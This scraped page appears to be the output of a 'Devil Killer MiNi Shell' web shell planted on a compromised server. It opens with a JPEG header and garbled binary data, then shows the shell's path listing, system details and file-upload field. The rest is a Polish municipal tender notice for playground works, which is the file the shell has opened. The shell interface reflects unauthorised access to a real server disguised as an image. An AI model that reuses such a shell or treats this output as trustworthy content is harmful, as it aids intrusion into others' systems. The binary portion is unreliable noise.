JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220804/0029186501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> __Oprac. pełnozakres. dok. proj. wraz z rozbudową i dop. istniej. placu zabaw oraz budową ogrodzenia w systemie „zaprojektuj i buduj” w BO pn.„Więcej ruchu mały zuchu” zakup i montaż dla PI nr 1 w B-B </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała Urząd Miejski w Bielsku-Białej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072181741</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.bielsko-biala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.bielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> __Oprac. pełnozakres. dok. proj. wraz z rozbudową i dop. istniej. placu zabaw oraz budową ogrodzenia w systemie „zaprojektuj i buduj” w BO pn.„Więcej ruchu mały zuchu” zakup i montaż dla PI nr 1 w B-B </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5fb24877-13d3-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00291865</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024961/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Budżet Obywatelski &#34;Więcej ruchu mały zuchu&#34; - zakup i montaż integracyjnego zestawu sprawnościowego oraz innych urządzeń rekreacyjnych wraz z ogrodzeniem dla Przedszkola integracyjnego nr 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.um.bielsko.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umbielsko.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywasię przy użyciu Platformy do elektronicznej obsługi<br/>zamówień (zwanej dalej: „Platformą”)<br/>dostępnej podadresem: www.um-bielsko.logintrade.net/rejestracja/ oraz poczty elektronicznej zp@um.bielsko.pl lub<br/>m.wanat@um.bielsko.pl2. Osobą uprawnioną do komunikowania się z Wykonawcami jest: MateuszWanat – Główny Specjalista w<br/>Wydziale Zamówień Publicznych (tel. 33 4971 855,<br/>adres e-mail:m.wanat@um.bielsko.pl 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzieleniezamówienia<br/>publicznego, musi posiadać konto na Platformie. Wykonawca posiadający konto naPlatformie ma możliwość złożenia, wycofania<br/>oferty oraz składania wniosków o wyjaśnienie treściSWZ. 4. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>przekazania przedmiotowychśrodków dowodowych, podmiotowych środków dowodowych oraz innych oświadczeń idokumentówprzy<br/>ich użyciu zostały opisane poniżej:1) Do połączenia używany jest szyfrowany protokół HTTPS.Szyfrowanie danych odbywa się przy<br/>pomocy protokołu SSL. Certyfikat SSL zapewnia poufnośćtransmisji danych przesyłanych przez Internet. Wykonawca posiadający<br/>konto na Platformie ma dostępdo możliwości złożenia, wycofania oferty, a także funkcjonalności pozwalających na zadawanie<br/>pytańdo treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. Dopuszczalneprzeglądarki internetowe: Internet<br/>Explorer 10 i nowsze, Edge Google Chrome Mozilla FirefoxOperaPozostałe wymagania techniczne: dostęp do sieci internet obsługa<br/>przez przeglądarkę protokołuXMLHttpRequest - ajax włączona obsługa JavaScript zalecana szybkość łącza internetowego<br/>powyżej500 KB/s zainstalowany Acrobat Reader zainstalowane środowisko uruchomieniowe Java - Java SERuntime Environment 6<br/>Update 24 lub nowszy Maksymalny rozmiar plików przesyłanychzapośrednictwem Platformy wynosi 150 MB.6. Za datę przekazania<br/>oferty, oświadczenia, o którym mowaw art. 125 ustawy Pzp, przedmiotowych środków dowodowych, podmiotowych środków<br/>dowodowych.Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Robotybudowlane oraz innych<br/>oświadczeń i dokumentów przyjmuje się datę ich wpływu na Platformę, a niedatę wykonania danej czynności przez Wykonawcę na<br/>Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1-3 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) – zwanego dalej „RODO”, zamawiający jako administrator danych osobowych wypełnia obowiązek informacyjny<br/>związany ze zbieraniem danych osobowych bezpośrednio od osób fizycznych, których dane dotyczą, w celu<br/>związanym z nin. postępowaniem o udzielenie zamówienia publicznego, informując wykonawcę, że: a) administratorem Pani/Pana<br/>danych osobowych jest Miasto Bielsko-Biała reprezentowane przez Prezydenta Miasta B-B, adres: UM w B-B, pl. Ratuszowy 1, 43-<br/>300 B-B, tel. 33 4971 851; b) w Mieście B-B UM w Bielsku-Białej powołany został inspektor ochrony danych osobowych, dane<br/>kontaktowe: tel. 33 4971 721, adres e-mail: iod@um.bielsko.pl;c) Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie zamówienia publicznego na realizację zadania<br/>pn.opracowanie pełnozakresowej dokumentacji projektowej wraz z rozbudową i doposażeniem istniejącego placu zabaw oraz<br/>budową ogrodzenia w systemie „zaprojektuj i buduj” - w ramach zadania Budżetu obywatelskiego pn. „Więcej ruchu mały zuchu” -<br/>zakup i montaż integracyjnego zestawu sprawnościowego oraz innych urządzeń rekreacyjnych wraz z ogrodzeniem dla przedszkola<br/>integracyjnego nr 1 przy u. Korzennej 37 w Bielsku – Białej , znak sprawy: ZP.271.2.31.2022.MW, d)odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym, określonym w przepisach ustawy Pzp, związanym<br/>z udziałem w nin. postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; g)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 RODO; h) posiada Pani/Pan: na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących, Uwaga: W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacjimających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego. W przypadku gdy wykonanie obowiązków, o<br/>których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby,którejdane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego<br/>postępowania o udzielenie<br/>zamówienia.-na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych, Uwaga: Skorzystanie przez osobę,<br/>której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o których mowa w art. 16 RODO, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o<br/>którym mowa w art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników. -na podstawie art. 18 RODO,<br/>prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 RODO, Uwaga: Prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania oudzielenie zamówienia publicznego.- prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących<br/>naruszaprzepisy RODO,i) nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO, prawo do usunięcia danych<br/>osobowych,- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,- na podstawie art. 21 RODO, prawo<br/>sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.2) Zamawiający<br/>udostępnia dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia korzystania ze środków ochrony prawnej, o których<br/>mowa w Dziale VI ustawy Pzp, do<br/>upływu terminu do ich wniesienia.3) Zamawiający przetwarza dane osobowe zebrane w nin. postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.4) Do przetwarzania danych<br/>osobowych, o których mowa w art. 10 RODO, mogą być dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby<br/>dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności.5) W przypadku danych osobowych<br/>zamieszczonych przez zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 RODO, są<br/>wykonywane w drodze żądania skierowanego do zamawiającego.6) Ponadto zamawiający informuje, że zgodnie z art. 13 RODO, w<br/>zamówieniach publicznych administratorem danych osobowych, obowiązanym do spełnienia obowiązku<br/>informacyjnego, jest również w szczególności:a) wykonawca – względem osób fizycznych, od których dane osobowe bezpośrednio<br/>pozyskał. Dotyczy to w szczególności:- osoby fizycznej skierowanej do realizacji zamówienia,- podwykonawcy/ podmiotu trzeciego<br/>będącego osobą fizyczną,-<br/>podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,- pełnomocnika<br/>podwykonawcy/ podmiotu trzeciego będącego osobą fizyczną (np. dane<br/>osobowe zamieszczone w pełnomocnictwie),- członka organu zarządzającego podwykonawcy/ podmiotu trzeciego, będącego osobą<br/>fizyczną (np. dane osobowe zamieszczone w informacji z KRK);<br/>b) podwykonawca/ podmiot trzeci – względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał – dotyczy to w<br/>szczególności osoby fizycznej skierowanej do realizacji zamówienia.7) Wykonawca ubiegający się o udzielenie zamówienia<br/>publicznego jest zobowiązany do<br/>wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w nin. postępowaniu. Do obowiązków tych należą<br/>m.in. obowiązki wynikające z RODO, w szczególności obowiązek<br/>informacyjny, przewidziany w art. 13 RODO, względem osób fizycznych, których dane osobowe dotyczą i od których dane te<br/>wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny,<br/>wynikający z art. 13 RODO, nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje<br/>już tymi informacjami, zgodnie z art. 13 ust. 4 RODO.8) Ponadto wykonawca będzie musiał wypełnić obowiązek informacyjny,<br/>wynikający z art. 14 RODO, względem<br/>osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co<br/>najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.9) W celu zapewnienia, że wykonawca wypełnił, określone w ppkt.<br/>7 i 8, obowiązki informacyjne oraz ochrony<br/>prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem wykonawcy w nin.<br/>postępowaniu, zobowiązany jest do złożenia w nin. postępowaniu o udzielenie<br/>zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14<br/>RODO – wg wzoru stanowiącego Załącznik nr 1a do nin. SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.108.2022.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest :<br/>1. opracowanie pełnozakresowej, pełnobranżowej i kompletnej dokumentacji projektowo-kosztorysowej dla wykonania<br/>modernizacji placu zabaw oraz budową ogrodzenia terenu Przedszkola Integracyjnego nr 1w Bielsku-Białej<br/>2. wykonanie robót budowlanych objętych zakresem wykonanej dokumentacji projektowej (tj. modernizacji placu zabaw,<br/>zerwania zniszczonej nawierzchni asfaltowej, wykonanie trawnika oraz budowy ogrodzenia)<br/>• Zamawiający zobowiązuje Wykonawcę do opracowania Dokumentacji zgodnie<br/>z obowiązującymi w tym zakresie przepisami, zasadami wiedzy technicznej, etyką zawodową .<br/>• Dokumentacja powinna obejmować opracowanie projektowe wielobranżowe lub w razie konieczności pełnobranżowy<br/>projekt budowlany w zakresie wszystkich branż z elementami projektu wykonawczego w zakresie niezbędnym do zgłoszenia<br/>lub w razie konieczności uzyskania decyzji administracyjnej w zakresie, który umożliwi na jego podstawie należyte<br/>wykonanie robót budowlanych bez konieczności wykonywania dodatkowych opracowań.<br/>Dokumentacja zostanie przygotowana w oparciu o ustawę Prawo Budowlane a w razie konieczności projekt budowlany<br/>należy wykonać zgodnie z Rozporządzeniem Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego<br/>zakresu i formy projektu budowlanego. Dodatkowo opracowanie powinno zawierać szczegółowe rysunki wykonawcze<br/>służące realizacji zadania. wraz z przedmiarami, kosztorysami oraz specyfikacją techniczną.<br/>Przedmiot zamówienia opisany jest szczegółowo w SWZ i niżej wymienionych załącznikach do SWZ, tj. :<br/>• OPZ<br/>• Program funkcjonalno-użytkowy - zał. nr 8 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37535200-9 - Wyposażenie placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) cena oferty brutto (C) 60% max. 60 pkt.<br/>2) czas wydłużenia okresu udzielenia 40% max. 40 pkt.<br/>gwarancji (G)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wydłużenia okresu udzielenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>a) Wykonawca musi wykazać, że wykonał w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie,<br/>• co najmniej jedną (1) usługę – opracowanie projektowe/ projekt budowlany/wykonawczy budowy / przebudowy placu<br/>zabaw oraz,<br/>• że wykonał w ostatnich pięciu latach przed upływem terminu składania ofert - jedną budowę placu zabaw o wartości robót<br/>co najmniej 150 000 zł brutto (roboty objęte jedną umową lub jedną lokalizacją).<br/>Usługi/Roboty te winny być wykonane należycie.<br/>b) Wykonawca musi wykazać, że dysponuje osobami, które zostaną skierowane do realizacji niniejszego zamówienia,<br/>posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie.<br/>• Projektanta w branży architektonicznej - posiadającego uprawnienia budowlane do projektowania lub odpowiadające im<br/>równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>posiadającego, co najmniej 3 letnie doświadczenie zawodowe w realizacji projektów dot. placów zabaw, po uzyskaniu<br/>uprawnień budowlanych.<br/>• Kierownika budowy /robót w branży konstrukcyjno-budowlanej - posiadającego uprawnienia budowlane do kierowania<br/>robotami w specjalności konstrukcyjno-budowlanej lub odpowiadające im równoważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadającego, co najmniej 3 letnie doświadczenie<br/>zawodowe w realizacji placów zabaw, po uzyskaniu uprawnień budowlanych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>Wykaz usług/robót (w formie elektronicznej lub postaci elektronicznej) (Załącznik nr 5a do SWZ) wykonanych nie wcześniej niż w<br/>okresie ostatnich 3 lat (usługi)/ 5 lat (roboty) przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi/roboty<br/>te zostały wykonane, z załączeniem dowodów określających czy te usługi/roboty zostały wykonane należycie, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi/roboty były wykonywane, a<br/>jeżeli z uzasadnionej przyczyny o 